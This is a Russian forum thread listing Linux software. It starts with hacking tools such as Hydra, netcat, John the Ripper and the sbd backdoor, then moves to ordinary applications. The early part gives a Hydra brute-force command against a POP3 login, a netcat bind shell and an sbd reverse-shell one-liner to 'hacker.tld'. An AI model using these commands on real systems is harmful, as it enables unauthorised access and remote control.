Некоторые тулзы (вроде обзора).

THC Hydra
http://thc.org/download.php?t=r&f=hydra-4.7-src.tar.gz

Брутфорс для огромного кол-ва сервисов.
POP3, IMAP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD (SSL), ICQ, FTP, PostgreSQL, MySQL, SSH, Telnet, Netbios, LDAP NNTP, VNC ... и т д.

Правда, POP3 и IMAP на распространенных сервисах им брутить врядли удасться, попробовать стоит.
Модуль ICQ устарел и тоже не работает.
Чтобы использовать остальное, читайте мануалы в архиве.

Сначала стянем архив.

wget http://thc.org/download.php?t=r&f=hydra-4.7-src.tar.gz


Распакуем

gzip -d hydra-4.7-src.tar.gz
tar -xf hydra-4.7-src.tar

или

tar -xzf hydra-4.7-src.tar.gz


И ставим

cd hydra-4.7-src
./configure
make
make install


можно копирнуть назад и удалить исходники

cp hydra ..
cd ..
rm -rf hydra-4.7-src


Работаем

./hydra (для справки)
./hydra -l lamer -P pass.txt -w 20 -t 10 pop.server pop3

для подбора пароля из словаря pass.txt к логину lamer
на сервере pop.server, timeout=20 sec, потоков 10.


NETCAT
http://online.securityfocus.com/data/tools/nc110.tgz

Ненадо комментировать. Утилита служит например при back-connect'е, или если надо пройти квест, отправляя на сервер произвольные ХТТП пакеты.

Прослушка порта

nc -l -p [PORT] -t


Коннект

nc server port


Типа bindshella

nc -l -p 28876 -t -e cmd.exe


NMAP
http://download.insecure.org/nmap/dist/nmap-3.81.tar.bz2

Сканнер. Для некоторых флагов нужны права root.
Установка:
Тут у нас архив bzip. =>


bzip2 -cd nmap-VERSION.tar.bz2 | tar xvf -
cd nmap-VERSION
./configure
make
make install


Использование. Все не опишешь, читайте мануалы.
Например

./nmap -p 1-65535 server


TCPDump
http://www.tcpdump.org/release/tcpdump-3.9.3.tar.gz

Читаем http://www.tcpdump.org/

TCH amap
http://www.thc.org/download.php?t=r&f=amap-5.1.tar.gz

Установка не отличается от hydrы.

PuTTy
PuTTy http://www.tartarus.org/~simon/putty-snapshots/x86/putty.exe
Gen http://www.tartarus.org/~simon/putty-snapshots/x86/puttygen.exe
исходники http://the.earth.li/~sgtatham/putty/latest/putty-0.58.tar.gz
PSFTP http://www.tartarus.org/~simon/putty-snapshots/x86/psftp.exe

Хотя для Windows, я написал ее в этот топик. Это клиент SSH, Telnet, и др. С настройкой цветов, соотв. клавишь, звуков (динамика) и т д

John the Ripper
UNIX http://www.openwall.com/john/c/john-1.6.tar.gz
WINDOWS http://www.openwall.com/john/c/john-16w.zip
DOS http://www.openwall.com/john/c/john-16d.zip

Крякер хешей (подбор конечно).
Обычно юзают для подбора DES.


john

---------------------------------

Сначала стянем архив.

Код:


wget http://thc.org/download.php?t=r&f=hydra-4.7-src.tar.gz


Распакуем

Код:


gzip -d hydra-4.7-src.tar.gz
tar -xf hydra-4.7-src.tar

или

Код:


tar -xzf hydra-4.7-src.tar.gz


И ставим

Код:


cd hydra-4.7-src
./configure
make
make install


можно копирнуть назад и удалить исходники

Код:


cp hydra ..
cd ..
rm -r
или одной командой:
emerge hydra
для RPM-дистров(почти всех) и Дебиан/Убунту:
apt-get hydra

Нессус - сканер багов в шлюзовых интерфейсах (cgi-сканнер в народе)

emerge nessus или apt-get nessus и т.д. для разных дистров

Написал бы где его скачать ещё...

Написал бы где его скачать ещё...
http://www.nessus.org/download/

Не очень мощьный но правда развивающийся cgi-сканер Nikto

http://www.cirt.net/nikto/nikto-current.tar.gz

Unix Requirements
PERL module NET::SSLeay
PERL module LibWhisker (LW.pm is included with source)
OpenSSL (only required if SSL scans are needed)


nikto [-h target] [options]

и полный README (http://www.cirt.net/nikto/README_nikto.html)

OpenSSL
http://www.openssl.org/

Пояснять думаю ненужно.

LSOF
ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/

Открытые файлы, смонтированые в /proc процессы... показывает

Hunt
http://lin.fsid.cvut.cz/~kra/index.html#HUNT

Пакетный (rawsocket) сниффер

NetFilter
http://www.netfilter.org/

Фаер/Фильтр. Не пользовался, но думаю вещь ничего...

Shadowinteger's Backdoor, Netcat-clone, утилитка для удаленного администрирования, защищённой отправки файлов, и p2p чата.

качаем:
wget http://tigerteam.se/dl/sbd/sbd-1.36.tar.gz

tar -zxvf sbd-1.36.tar.gz

установка:
make unix

пример на бэкконект:
user@owned# ./sbd -r1800 -Don -e /bin/bash hacker.tld 993

Readme в архиве объясняет как пользоватса.

Ethereal - сниффер, имхо, один из луччих. Работа с любыми сетевыми интерфейсами, arp-spoofing, гибкая система фильтров.
http://www.ethereal.com/download.html

EncFs - тулза для создания зашифрованой виртуальной файловой системы
http://arg0.net/wiki/encfs

Base64 - простая програма для конвертирования текста в base64 и обратно. http://www.fourmilab.ch/webtools/base64/

apg - Автоматический генератор паролей, использующий несколько надёжных алгоритмов. http://www.adel.nursat.kz/apg/

Authforce - HTTP брутфорсер. использует различные методы брутфорса пары логин/пароль для доступа к сайту. http://kapheine.hypa.net/authforce/

Bjorb - софтина для создания безопасного интернет соединения через ебезопасную сеть типа Internet.
фишки:
1. шифровка/расшифровка любого соединения на "статическом порту" при помощи SSL
2. ограничение доступа по IP адресам
http://www.hitachi-ms.co.jp/bjorb/

Doorman - бесшумный, невидимый а всех TCP портах сервер который откроет свою дверь тому, кто знает, секретный стук. http://doorman.sourceforge.net/ (backdoor короче.)

Fcrackzip - быстрый зломщик паролей к .zip архивам, аписаный на Си с включением кода на x86 ассемблере. Позволяет пользователям восстановить забытые пароли, используя брутфорс или подбор по словарю. http://www.goof.com/pcg/marc/fcrackzip.html

kssh - графический интерфейс а-ля putty для SSH. http://kssh.sourceforge.net

L0phtCrack - программа для расшифровки виндовский LANMAN и NT паролей (брутфорс и по словарю). http://www.atstake.com/products/lc/

mdcrack - брутит MD4 MD5 и NTLM1 хеши http://membres.lycos.fr/mdcrack/download/mdcrack-1.2.tar.gz

Slurpie - подборщик паролей passwd, может работать в режиме распределённых вычислений. ftp://ftp.openbsd.org/pub/OpenBSD/distfiles/slurpie-2.0b.tar.gz

rmt
rmt используется другими программами для удаленного управления приводом магнитных лент.

tar
tar - программа архивации, сохраняющая и извлекающая файлы из архивов tar.

rats - анализатор исходного кода, для таких языков как: C, C++, php, perl, и python

The homepage for rats is:
http://www.securesoftware.com/resources/download_rats.html


-------

proxychains - перенаправляет трафик через socks/proxy сервер
альтернатива sockscap / premeo / eborder driver

http://proxychains.sourceforge.net

Название проги:
Kaspersky Anti-Spam
Тип проги:
Anti-Spam
Лицензия:
Бесплатна
Интерфейс:
Русский
Подробное описание:
Система фильтрации спама, предназначенная для защиты корпоративных и провайдерских сетей. Cпособна самостоятельно анализировать текст письма и отсеивать нежелательную корреспонденцию благодаря технологии лингвистического анализа писем. Благодаря технологии Urgent Detection System (UDS), Kaspersky Anti-Spam, кроме традиционных обновлений по расписанию, использует мгновенные запросы к серверу, что позволяет заблокировать нежелательные письма уже через секунду после обнаружения образца рассылки спам-аналитиками "Лаборатории Касперского".
Линк для закачки:
Скачать (http://dnl-ru2.kaspersky-labs.com/products/release/russian/antispam/rpm/kas-3-3.0.255-0.i386.rpm)


Название проги:
Nmap 4.1
Тип проги:
Сканер
Лицензия:
Free
Интерфейс:
Русский
Подробное описание:
Сетевой сканер - Nmap (Network Mapper) обследует сети и проводит аудит защиты. Поддерживается как режим командной строки, так и режим графического интерфейса.
Линк для закачки:
Скачать (http://soft.deport.ru/download.php?id=475)


Название проги:
Opera for *NIX 9.01 Final
Тип проги:
Браузер
Лицензия:
Free
Интерфейс:
Русский
Подробное описание:
Компактный пакет быстро работающих коммуникационных программ , в который входят веб-браузер, почтовый клиент, RSS-ридер и IRC-клиент, а также плюс качалка файлов, включая через torrent-сеть
Линк для закачки:
Скачать (http://ftp.opera.com/pub/opera/unix/)


Название проги:
Mozilla Firefox for Linux
Тип проги:
Браузер
Лицензия:
Free
Интерфейс:
Русский
Подробное описание:
Быстро работающий браузер, причем быстрота работы заметна не только во время загрузки веб-страниц, но и при поиске в закладках и Истории. Сделан он на основе движка Mozilla и позволяет просматривать все веб-страницы в одном многовкладочном окне, а также обладает множеством других полезных опций, включая способность значительного расширения возможностей подключением плагинами.
Линк для закачки:
Скачать (http://soft.deport.ru/download.php?id=446)


Название проги:
Sendmail
Тип проги:
Передача почты
Лицензия:
Free
Интерфейс:
Английский
Подробное описание:
Широко используемая программа передачи почты для unix-систем. Sendmail обеспечивает работу модульной системы рассылки, которая предназначена для получения и отправки корреспонденции, а также управления программами подготовки и просмотра почтовых сообщений. Sendmail позволяет организовать почтовую службу локальной сети и обмениваться почтой с другими серверами почтовых служб через специальные шлюзы и может быть сконфигурирована для работы с различными почтовыми протоколами.
Линк для закачки:
Скачать (http://soft.deport.ru/download.php?id=451)


Название проги:
Simple Instant Messenger
Тип проги:
Общение
Лицензия:
Free
Интерфейс:
Английский
Подробное описание:
программа для обмена мгновенными сообщениями c поддержкой приема и отправки SMS, приемом и отправкой сообщений в формате RTF, передачей файлов и многим другим, в том числе возможностью использования в сетях ICQ, Jabber, MSN, Yahoo!, LiveJournal.
Линк для закачки:
Скачать (http://soft.deport.ru/download.php?id=454)


Название проги:
Linphone 1.3.5
Тип проги:
Веб-телефон
Лицензия:
Free
Интерфейс:
Английский
Подробное описание:
еб-телефон для GNOME. Позволяет осуществлять двусторонние голосовые переговоры по IP-сетям (в т.ч. по Интернету). Может соединяться с другими веб-телефонами, работающими по протоколу SIP. Может использоваться как на высокоскоростных линиях, так и на медленных модемных соединениях.
Линк для закачки:
Скачать (http://soft.deport.ru/download.php?id=467)

Название проги:
MPlayer 1.0pre8
Тип проги:
Мультимедийный плеер
Лицензия:
Free
Интерфейс:
Русский
Подробное описание:
Мультимедийный плеер. MPlayer поддерживает широкий диапазон кодеков и форматов файлов, включая MPEG 1/2/4, DivX 3/4/5, Windows Media 7/8/9, RealAudio/Video (до версии 9 включительно), а также Quicktime 5/6 и Vivo 1/2. Без проблем проигрывает VCD и DVD, в том числе с показом субтитров.
Несмотря на то, что В Mplayer имеется множество собственных оптимизированных аудио и видео кодеков, возможно подключение к нему дополнительных бинарных кодеков XAnim и RealPlayer и кодеков Win32 из DLL библиотек, что позволяет плееру проигрывать чуть ли не все существующие форматы видеосигналов.
Кроме этого, поддерживается конвертация всех поддерживаемых форматов в raw/divx/mpeg4 AVI, а также видеозахват с V4L устройств. Наконец, поддерживается и изменение графического интерфейса с помощью скинов.
Линк для закачки:
Скачать (http://www.softoman.ru/download.php?id=571)

Название проги:
Picasa for Linux
Тип проги:
Графика
Лицензия:
Бесплатна
Интерфейс:
Английский
Подробное описание:
Picasa for Linux - Программа для работы с изображениями.
Позволяет искать, редактировать и печатать фотографии, а также обмениваться ими.
При каждом запуске Picasa автоматически определяет местоположение фотографий на жестком диске и сортирует их в визуальные альбомы, упорядоченные по датам, так что потеряться ни одной картинке не удастся.
Линк для закачки:
Скачать (http://www.softp.ru/i125074?dl=1)

Название проги:
Ubuntu Center Alpha v.1
Тип проги:
Мультимедия
Лицензия:
Бесплатна
Интерфейс:
Английский
Подробное описание:
Ubuntu Center - Центр управления мультимедийными приложениями дистрибутивов семейства Ubuntu (Ubuntu Breezy, Kubuntu, XUbuntu, nUbuntu).
Включает в себя аудиобиблиотеку, библиотеку графических файлов, хранилище закладок, календарь, информация о скаченных/отправленных файлах и модуль администрирования
Линк для закачки:
Скачать (http://www.softp.ru/i125291?dl=1)

amap - инструмент для сканирования, позволяющий удаленно идентифицировать приложения, выполняющиеся на определенном порту.
Скачать (http://www.thc.org/releases/amap-5.2.tar.gz)

KDE Network Mapper - утилита для создания карты сети, тестирования и сканирования.
Скачать (http://ovh.dl.sourceforge.net/sourceforge/knetmap/knetmap-0.2.0.tar.gz)

Remote nmap (Rnmap) – программа, позволяющая удаленно просматривать порты, используя централизованный сервер.
Скачать (http://prdownloads.sourceforge.net/rnmap/rnmap_0.10.tar.gz)

GnoScan – мультипоточный сетевой сканер с графическим интерфейсом для GNOME.
Скачать (http://download.berlios.de/gnoscan/GnoScan-0.1.2.tar.gz)

SARA
(SARA) Security Auditor's Research Assistant инструмент для анализа защиты системы.
Скачать (http://www.www-arc.com/sara/downloads/sara-7.0.4a.tgz)

chkrootkit
Chkrootkit – инструмент, проверяющий локальную систему на признаки заражения rootkit.
Скачать (ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz)

Rootkit Hunter 1.2.9
Rootkit Hunter сканирует файлы на системе на предмет обнаружения известных и неизвестных руткитов, бэкдоров и снифферов.
Скачать (http://puzzle.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.2.9.tar.gz)

incident.pl 2.9
Скрипт для автоматического уведомления о нарушении безопасности
Скачать (http://www.viraj.org/incident/incident-2.9.tar.gz)

Process Change Detection System 2.9
Process Change Detection System – это скрипт, написанный на Perl, позволяет следить за появлением новых процессов в системе(например backdoor).
Скачать (http://doornenburg.homelinux.net/scripts/pcds/pcds-2.9.gz)

File::Scan 1.40
Модуль File::Scan может использоваться как многоплатформенный интерфейс для написания сканера для обнаружения Windows/DOS/Mac вирусов
Скачать (http://freshmeat.net/redir/filescan/22012/url_tgz/File-Scan-1.40.tar.gz)

Tiger security tool 3.2rc3
Tiger - набор Bourne shell scripts, C программ, и файлов данных, которые используются для ревизии защиты Unix систем.
Скачать (http://savannah.nongnu.org/download/tiger/tiger-3.2rc3.tar.gz)

IRC Defender
Утилита для защиты IRC сетей, написанная на Perl.
Скачать (http://prdownloads.sourceforge.net/ircdefender/defender.tar.gz)

sptrace 1.4.0
Это безопасный ptrace() модуль для Linux.
Скачать (http://www.SecurityLab.ru/_tools/sptrace-1.4.0.tar.gz)

Injector Linux 1.4
Это операционная система Linux на одном флоппи-диске.
Скачать (http://prdownloads.sourceforge.net/injector/Injector-1_4.tar.gz)

cipherfunk Patched Linux Kernels | 2.4.20-fnk2
cipherfunk Patched Linux Kernels – исправление к LINUX ядру, обеспечивающее более устойчивую работу, оптимизацию и защиту.
Скачать (ftp://cipherfunk.org/pub/kernels/v2.4/patch-2.4.20-fnk2.gz)

Leka Rescue Floppy v0.7.0
Leka Rescue Floppy - минираспределение Linux, которое помещается на один гибкий диск.
Скачать (http://www.securityfocus.com/data/tools/leka-0.7.0.tar.gz)

Saint Jude, Linux Kernel Module 0.22
Saint Jude- модель для обнаружения неправомочных или неподходящих изменений привилегий.
Скачать (http://prdownloads.sourceforge.net/stjude/StJude_LKM-0.22.tar.gz)

LOMAC 1.1.2
LOMAC - расширение защиты для Linux, который использует Low Water-Mark Mandatory Access Control, чтобы защитить целостность процессов и данных от вирусов, троянских коней, злонамеренных удаленных пользователей и и опасных процессов ядра.
Скачать (http://opensource.nailabs.com/lomac/downloads/lomac-v1.1.2.tar.gz)

KSTAT - Kernel Security Therapy Anti-Trolls v1.1-2
KSTAT - инструмент для обнаружения нападения в обход различных методов сокрытия
Скачать (http://www.s0ftpj.org/tools/kstat24_v1.1-2.tgz)

Linux Security Auditing Tool v0.8.1
Linux Security Auditing Tool (LSAT) - инструмент ревизии защиты LINUX/UNIX.
Скачать (http://www.securitylab.ru/_tools/lsat-0.8.1.tgz)

Rkdet 0.54
Rkdet - daemon, который обнаруживает попытку установки rootkit или сниффера.
Скачать (http://vancouver-webpages.com/rkdet/rkdet-0.54.tar.gz)

Sysstat v4.1.6
Пакет sysstat выводит отчет о работе системы, использует информацию команд sar и iostat.
Скачать (ftp://ibiblio.org/pub/Linux/system/status/sysstat-4.1.6.tar.gz)

Swatch 3.0.8
Swatch – утилита для активного мониторинга журналов регистрации. Может контролировать практически любые типы лог файлов.
Скачать (http://prdownloads.sourceforge.net/swatch/swatch-3.0.8.tar.gz)

RotoRouter 1.9b
RotoRouter – подмена стандартной UNIX udp-основанной программы traceroute.
Скачать (http://packetstorm.linuxsecurity.com/UNIX/loggers/rr.c.gz)

Libsafe v2.0-16
Libsafe позволяет защититься от атак типа format string и buffer overflow.
Скачать (http://www.research.avayalabs.com/project/libsafe/src/libsafe-2.0-16.tgz)

Название проги:
Axel 1.0b
Тип проги:
менеджер закачек
Лицензия:
GPL
Интерфейс:
Английский
Подробное описание:
Маленький, но очень удобный в использовании менеджер закачек/акселератор. Работает из коммандной строки и требует очень мало ресурсов системы. Поддерживает большое количество unix-like систем и обладает стандартным набором функций дял программ данного класса.
Линк для закачки:
Скачать (http://iplace.ru/soft/get/0-147/?from=iplace.ru)

Название проги:
DBF Viewer and Editor 2.99.02
Тип проги:
Работа с DBF-файлами
Лицензия:
Commercial
Интерфейс:
Английский
Подробное описание:
Консольная программа для просмотра и правки DBF-файлов. Наиболее частые применения данной программы: клавиатурные макросы, работа с выбранной строкой в DBF-файле, экспорт в другие форматы TXT, CSV, SQL, HTML.
Линк для закачки:
Скачать (http://iplace.ru/soft/get/0-131/?from=iplace.ru)

Название проги:
Smb4K 0.6.0
Тип проги:
локальные сети
Лицензия:
GPL
Интерфейс:
Английский
Подробное описание:
Программа позволяет просматривать и монтировать разделяемые ресурсы в локальной сети. Очень удобный аналог "Сетевого окружения" для Unix систем. Как и все программы для KDE иммет приятный интерфейс и в то же время обладает всеми необходимыми функциональными возможностями.
Очень полезной является возможность авторизоваться на любом ресурсе сети под любым пользователем. Так же программа может производить поиск файлов в разделяемых сетевых ресурсах.
Линк для закачки:
Скачать (http://iplace.ru/soft/get/0-224/?from=iplace.ru)

Название проги:
Wine 0.9.22
Тип проги:
Эмулятор Windows
Лицензия:
Free
Интерфейс:
Русский
Подробное описание:
Wine - Wine - это не эмулятор Windows, как думают многие, а альтернативная реализация API Windows 3.x и Win32 (кстати, и расшифровывается Wine как "Wine Is Not Emulator").
Wine позволяет конечному пользователю выполнять в unix-системах (и Linux) многие приложения, написанные для ОС Windows.
Линк для закачки:
Скачать (http://soft.deport.ru/download.php?id=379)

Yakuake 2.7.5
Удобная консоль(как в геймах q3,cs)
Скачать (http://www.kde-look.org/content/download.php?content=29153&id=1)

Название проги:
Openofficeorg 2.1
Тип проги:
Офисные приложения
Лицензия:
GPL
Интерфейс:
РУсский
Подробное описание:
OpenOffice.org - это популярный пакет офисных приложений. В его состав входят следующие компоненты: Writer (текстовый процессор и редактор HTML), Calc (электронные таблицы), Draw (графический редактор), Impress (система презентаций), редактор формул и модуль доступа к данным. По своим возможностям OpenOffice.org вполне сопоставим с MS-Office.
P.S Обьем пакета велик(110мб)
Линк для закачки:
Скачать (http://download.i-rs.ru/pub/openoffice/2.1/ru/OOo_2.1_LinuxIntel_install_ru_infra_rpm.tar.bz2)

Название проги:
Gnumeric 1.7.0
Тип проги:
Электронные таблицы
Лицензия:
Free
Интерфейс:
Английский и Русский
Подробное описание:
Gnumeric - Электронные таблицы для использования с Gnome, функционально похожие на Microsoft Excel для Unix
Линк для закачки:
Скачать (http://soft.deport.ru/download.php?id=492)

Название проги:
AbiWord 2.4.5
Тип проги:
Мультиплатформенный текстовый процессор
Лицензия:
Free
Интерфейс:
Русский
Подробное описание:
AbiWord - Мультиплатформенный текстовый процессор с открытыми исходными текстами. Основные возможности:
- Основное форматирование символов (полужирность, наклон, подчеркивание)
- Выключка абзацев
- Проверка орфографии
- Импорт документов Word97 и RTF
- Интерактивные линейки и отступы
- Стили
- Неограниченный откат/возврат
- Многоколоночное управление
-Поиск/Замена.
Расширяется AbiWord for Windows .
Линк для закачки:
Скачать (http://soft.deport.ru/download.php?id=489)

Название проги:
PHP 5.1.4
Тип проги:
PHP
Лицензия:
Free
Интерфейс:
Английский
Подробное описание:
PHP - Новая версия языка программирования PHP, используемого при разработке веб-приложений. В этой версии исправлены серьезные ошибки по части безопасности.
Линк для закачки:
Скачать (http://www.php.net/get/php-5.1.4.tar.bz2/from/a/mirror)

Название проги:
Panda Antivirus for Linux
Тип проги:
Антивирус
Лицензия:
Бесплатна
Интерфейс:
Русский
Подробное описание:
Бесплатный антивирус для серверов и РС, работающих под Linux, а также под ОС Windows или DOS, но имеющих подключение к Linux-серверам. Надежная защита от вирусов. Управляется через командную строку или консоль.
Линк для закачки:
_http://download.ware.ru:8080/unix/1705_pavcl_linux_i386.rpm

Название проги:
xneur 0.0.5
Тип проги:
Автоматическое переключение раскладки.
Лицензия:
Бесплатная
Интерфейс:
Русский
Подробное описание:
Автоматическое переключение раскладки.
Линк для закачки:
_http://download.ware.ru:8080/unix/1702_xneur-0.0.5.tar.gz

PCManFM (http://pcmanfm.sourceforge.net)
Отличный lightweight файловый менеджер на GTK. Исполняемый файл размером 300 Кб, использование ОЗУ ~ 8 Мб.

P. S. Тему закрепил. (:

Название проги:
Mutt 1.5.12
Тип проги:
почтовый клиент
Лицензия:
Бесплатная
Подробное описание:
Консольный почтовый клиент mutt cреди пользователей операционных систем семейства Unix заслуженно считается одним из лучших, поскольку обладает поддержкой всех современных функций E-mail клиентов, молниеносной скоростью работы программы и простотой пользовательского интерфейса. Mutt поддерживает чтение и запись в различных форматах почтового ящика: mbox, MMDF, MH и Maildir. Тип почтового ящика распознается автоматически.
Линк для закачки:
скачать (http://c0nstantine.jino-net.ru/mutt-1.5.12.tar.gz)

Название проги:
Celestia 1.4.1
Тип проги:
Симулятор
Лицензия:
Free
Интерфейс:
Английский
Подробное описание:
Celestia - Трехмерный симулятор космического пространства, с помощью которого можно совершить виртуальное путешествие по солнечной системе, к звездам и даже за пределы нашей галактики.
Линк для закачки:
Скачать (http://soft.deport.ru/download.php?id=509)

KKBSwitch
индикатор раскладки клавиатуры для KDE.
умеет запоминать раскладку для окна, программы, глобально.
Сайт программы (kkbswitch.sourceforge.net)

Название проги:
MediaWiki 1.7.0
Тип проги:
Движок для вебсайтов
Лицензия:
Free
Интерфейс:
Английский
Подробное описание:
MediaWiki - Движок для вебсайтов, работающих по технологии "вики" (Wikipedia). MediaWiki написан на PHP и использует базу данных MySQL.
Движок MediaWiki предоставляет интерфейс работы с базой страниц, определение различных прав доступа к администрированию, возможность обработки текста как в собственном формате, так и в форматах HTML и TeX (для формул), закачку изображений и многое другое. Кроме этого, имеется возможность использования расширений, что позволяет добавлять в MediaWiki новые возможности.
Линк для закачки:
Скачать (http://sourceforge.net/project/downloading.php?groupname=wikipedia&filename=mediawiki-1.7.0.tar.gz&use_mirror=kent)

Название проги:
PHP-Fusion 6.01.3
Тип проги:
Cистема управления контентом (CMS)
Лицензия:
Free
Интерфейс:
Русский
Подробное описание:
PHP-Fusion - Cистема управления контентом (CMS), написанная на PHP. Использует базу данных mySQL, где хранит все содержимое веб-сайта.
PHP-Fusion предоставляет простую и наглядную систему администрирования и при этом обладает полным набором функций, необходимых любой CMS.
Ссылка "скачать" - английская версия; русифицированную версию PHP-Fusion и дополнения к ней можно скачать вот отсюда (http://php-fusion.int.ru/downloads.php)
Линк для закачки:
Скачать (http://soft.deport.ru/download.php?id=511)

Название проги:
K3b
Тип проги:
Запись CD/DVD.
Лицензия:
Свободная
Интерфейс:
Многоязычный
Подробное описание:
Удобная графическая многофункциональная утилита для записи CD/DVD под Linux, оптимизированная для KDE. Использует cdrecord, cdrdao и growisofs.
Линк для закачки:
k3b-0.12.17.tar.bz2 (http://ovh.dl.sourceforge.net/sourceforge/k3b/k3b-0.12.17.tar.bz2)

Название проги:
СОЛО на клавиатуре
Тип проги:
Клавиатурный тренажер
Лицензия:
Свободная
Интерфейс:
Русский/Английский
Подробное описание:
Обучающая программа, позволяющая в короткий срок научиться быстро печатать на клавиатуре компьютера.
Линк для закачки:
Скачать для FC5 (http://ergosolo.ru/download/linux/pre1/RPMS.FC5/solo8-8.X.pre1-83.FC5.i586.rpm)
Другие дистры (http://ergosolo.ru/rus/download/?product_id=6)

RAR - Новая версия популярного архиватора .


http://www.rarlab.com/rar/rarlinux-3.7.b1.tar.gz

XMMS - XMMS (X Multimedia System) - мультимедиа-плеер, внешне похожий на популярный среди пользователей Windows WinAmp . Поддерживается воспроизведение MPEG 1/2/3, Ogg Vorbis, WAV и всех форматов, поддерживаемых libmikmod. К XMMS можно подключать дополнительные модули ввода / вывода / эффектов / визуализации, за счет чего программа значительно расширяет свои возможности как по числу воспроизводимых форматов, так и по всевозможным расширениям функциональности.

Скачать (http://www.xmms.org/files/1.2.x/xmms-1.2.10.tar.gz)

Snort - Система обнаружения атак (IDS). Snort позволяет в режиме реального времени анализировать сетевой трафик, проверяя корректность структуры сетевых пакетов и соответствие содержимого определенным правилам. Для описания сетевых инцидентов и определения реакции системы используется гибкий язык сценариев.


Скачать (http://www.snort.org/dl/current/snort-2.6.1.3.tar.gz)

ManDVD - Программа для создания видео-DVD. Для работы требует следующих компонентов:

DVD Slideshow >= 0.7.5
mencoder
mplayer
MKISOFS >= 2.01
xine > 0.99.4
lame >= 3.97
dvdauthor >= 0.6.11
mjpegtools >= 1.8.0
netpbm >= 10.29
ImagMagick >= 6.2.4
transcode >= 1.0.2
dvd+rw-tools >= 5.21.4
Если все это уже есть, то просто распакуйте архив в ./mandvd.

Скачать (http://csgib36.ifrance.com/FTP/mandvd-2.4src.tar.gz)

Xnview - Не только популярный, но и очень удобный вьюер графики, поддерживающий просмотр и конвертирование файлов множества графических форматов.


Скачать (http://download.xnview.com/XnView-x86-unknown-linux2.x-static-fc4.tgz)

cdrtools - Пакет приложений для записи CD и DVD. Включает в себя cdrecord, mkisofs, cdda2wav, readcd и другие программы.

Скачать (ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01.01a17.tar.gz)

Exaile - Плеер, внешне похожий на amaroK, но с использованием GTK+ и дополнительными улучшениями - может быть открыто сразу несколько плейлистов, поддержка shoutcast, блеклист песен, загрузка гитарных табулатур, получении информации об артисте/альбоме из википедии, поддержка iPod и т.д.

Скачать (http://exaile.org/files/exaile_0.2.4.tar.gz)

Downloader for X - Мощный менеджер загрузок для Linux/Unix с множеством полезных опций. Поддерживается работа по HTTP и FTP, прокси, автоматическая докачка, ограничения полосы пропускания (скорости), планирование заданий, многопотоковая скачка, фильтры и многое другое.

Скачать (http://d4x.krasu.ru/files/d4x-2.5.7.1.tar.bz2)

Название проги:
XAMPP
Тип проги:
Web-Server
Лицензия:
Бесплатная
Подробное описание:
Некое подобие виндового Denwer'a, под *nix, но это уже полноценный сервер (LAMP).
Содержит: Apache2, PHP(4,5), PEAR, Perl, Mysql, SQLite, PhpMyAdmin, GD, OpenSSL, etc..
Плюсы:
+ не требует установки, просто распаковать в папку
+ сервер сразу настроен по дефолту
+ большое количество предустановленых программ, модулей
Размер:
~50mb
Офф. сайт:
http://www.apachefriends.org/en/xampp-linux.html

Название проги: Asterisk 1.2.22
статус: Freeware
Asterisk - это Open Source приложение,
работающее на Linux и FreeBSD и предназначенное
для создания решений компьютерной телефонии.
Asterisk обладает всеми возможностями
классической АТС, поддерживает три VoIP
протокола (SIP/H323/IAX), предоставляет
функции голосовой почты (VoiceMail),
конференций, интерактивного голосового
меню (IVR), центра обработки вызовов
(постановка звонков в очередь и распределение
их по агентам используя различные алгоритмы),
а также имеет гибкий и универсальный
интерфейс для интеграции с внешними
системами обработки данных (AGI). Все
это делает Asterisk мощнейшей платформой
для организации телекоммуникационного
сервиса любого масштаба.
http://www.asterisk.org/

Название проги: Nut 2.2.0
размер: 1,2 Mb
статус: GPL
Nut - набор утилит для управления и
мониторинга работы источников бесперебойного
питания. В пакет входит приличное количество
драйверов для различных ИБП, так что
у тебя не должно возникнуть проблем
при настройке. К примеру, я использую
nut вместе с apc smartups и очень доволен.
Одна из интересных фич - можно назначить
выполнение команды при совершении определенного
события, скажем, выключение компьютера
через 10 минут после нарушения питания.
Тэги: Источник бесперебойного питания,
UPS
http://random.networkupstools.org/


Название проги: Openssh 4.6p1
размер: 0,9 Mb
статус: BSD
OpenSSH представляет собой набор сетевых
инструментов, используемых для защищенного
доступа к удаленным компьютерам. Он
может быть использован в качестве непосредственной
замены rlogin, rsh, rcp и telnet. К
преимуществам OpenSSH стоит отнести:
способность производить аутентификацию
пользователей с помощью протоколов RSA
и DSA, имеющих в своей основе два криптографических
ключа (секретный и публичный) для организации
защищенных соединений без необходимости
непосредственного ввода пароля; поддержку
специальных алгоритмов шифрования (DES,
3DES, Blowfish для первой версии протокола
и AES-128, AES-192, AES-256, Blowfish,
CAST-128, ArcFour для второй); обеспечение
контроля целостности сеанса связи с
помощью CRC32 в протоколе SSH1 и HMAC-SHA1
в SSH2; защиту от IP, DNS и routing
спуфинга; возможность создания криптованных
туннелей посредством перенаправления
TCP-портов локального и удаленного узлов;
автоматическую компрессию передаваемых
данных, в том числе и сеансов по протоколу
X11 (сжатие на лету происходит точно
таким же алгоритмом, какой используется
в архиваторе gzip); прекрасное взаимодействие
с оконной системой X Window. Кроме всего
прочего, при использовании OpenSSH мы
получаем прозрачность работы, так как
процедура аутентификации и шифрование
сеанса выполняются незаметно для пользователя.
http://www.openssh.org/

LinuxDC++ 1.0.0

После трёх лет разработки LinuxDc++ наконец-то добрался до версии 1.0. Данный релиз, также замечателен тем, что раньше команда разработчиков отказывалась от распространения программы, мотивируя тем, что проект ещё не готов для массового использования. Теперь файлы архивов доступны для скачивания. LinuxDC++ это один из лучших клиентов для работы в сетях Direct Connect. Проект основан на исходных кодах DC++, оригинального клиента для платформы MS Windows.

_ftp://ftp.berlios.de/pub/linuxdcpp/linuxdcpp-1.0.0.tar.bz2

Название:
Cedega
Версия:
6.0.3
Описание:
Cedega (ранее WineX) — коммерческий продукт, основанный на исходном коде проекта Wine, позволяющего запускать Windows-приложения в Unix-системах. Создаётся компанией TransGaming Technologies. Cedega отличается от Wine своей нацеленностью на запуск игр, написанных для Microsoft Windows, в GNU/Linux. В частности, для этого была добавлена улучшенная поддержка API DirectX. Также имеется поддержка некоторых защит от копирования, применяемых в играх. В последних версиях Cedega имеет простой графический интерфейс, позволяющий устанавливать и запускать Windows-игры, производить конфигурирование программы.
Тип приложения:
Эмулятор.
